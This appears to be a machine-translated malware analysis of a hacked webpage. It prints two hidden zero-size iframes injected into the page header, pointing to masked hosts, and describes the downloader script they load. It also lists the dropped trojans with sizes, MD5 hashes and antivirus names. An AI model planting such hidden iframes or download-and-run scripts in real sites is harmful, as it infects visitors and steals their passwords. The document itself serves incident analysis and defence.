EndurerOriginal
1Version
Two sections of code are added to the webpage header:
Code Segment 1:
/---------
<IFRAME Height = 0 width = 0 src = "hxxp: // ip-ie.www *** 113.cnidc.cn/w3.**m/"> </iframe>
----------/
The content of W *** m.htm is escape ()-encrypted code. The decrypted content is a Javascript script program, which can be downloaded using Microsoft. XMLHTTP and ADODB. Stream./MC/111.exeSave as C:/boot.exe and run it using the ShellExecute method of Shell. Application.
Code Segment 2:
/---------
<IFRAME Height = 0 width = 0 src = "hxxp: // www. Z *** ZY *** qr.com. **/F *** J/Wm **. htm/"> </iframe>
----------/
The content of WM **. htm is escape ()-encrypted code, and the decrypted content is a Javascript script program. It also uses Microsoft. XMLHTTP and ADODB. Stream to download/MC/GAME/fj.exeSave as C:/boot.exe and run it using the ShellExecute method of Shell. Application.
Fj.exeUsing Borland Delphi setup module,
/---------
An error occurred while obtaining the file version information!
Creation Time: 20:42:53
Size: 15872 bytes, 15.512 KB
MD5: 945db5a79cf5e1a0cf097cbb30af858e
---------/
Kaspersky reportsTrojan-Downloader.Win32.Delf.ajm.
Fj.exe downloads the following files from the same website:
1)/MC/BaO/fujia.exe
, Created using UPX 0.89.6-1.02/1.05-1.24-> Markus & Laszlo,
/---------
Size: 39069 bytes, 38.157 KB
MD5: 9ac6f3cb5741973297c2be2b282f19b9
---------/
Kaspersky reportsTrojan-PSW.Win32.QQPass.ra.
2)/MC/pqpq.exe
Use nspack 1.3-> North Star/Liu Xing to ping the shell.
/---------
Language: Chinese (China)
File version: 0.000000191
Note:
Copyright:
Note:
Product Version: 0.000000191
Product Name: bw34esg
Company Name: bw34esg
Legal trademark:
Internal name: vj9we8r
Source File Name: vj9we8r.exe
Size: 44217 bytes, 43.185 KB
MD5: 9934b38446510bf7518207a0da22631c
---------/
3)/MC/gezi.exe
Not available. It may be a gray pigeon.
4)/MC/dabao.exe
Failed to get
5)/MC/xbao.exe
Failed to get
Save as C:/program files/common files
1. exe
2. exe
3. exe
4. exe
5. exe